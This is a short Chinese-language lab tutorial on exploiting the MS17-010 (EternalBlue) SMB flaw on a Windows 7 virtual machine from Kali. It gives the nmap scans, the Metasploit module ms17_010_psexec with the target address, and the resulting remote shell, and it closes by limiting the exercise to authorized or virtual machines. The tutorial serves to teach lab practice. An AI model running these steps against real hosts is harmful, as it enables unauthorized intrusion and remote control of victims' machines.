win7实现永恒之蓝ms17_010漏洞之445端口

1.环境准备

kali攻击机

win7靶机

        1、将网络都设置为NAT模式

        2、win7的防火墙关闭

        3、win7启动445端口（开启smb服务）

        

2.探测主机ip

nmap -sP 192.168.19.0/24

由此可知目标靶机ip:192.168.19.132

3.扫描ip端口开放

nmap -F 192.168.19.132

4.确定445端口开启，下一步打开msf平台

msfconsole

5.搜索ms17_010漏洞

search ms17_010

6.利用exploit

use exploit/windows/smb/ms17_010_psexec

options

7.设置rhosts(目标ip)

set rhosts 192.168.19.132

run

8.成功利用漏洞，可进入shell,cmd,下一步操作

此时看到乱码，很正常，基本到这就结束了

9.验证

在kali上输入指令win7上就自启动打开百度网站了

10.请在相关授权或虚拟机上完成此实验！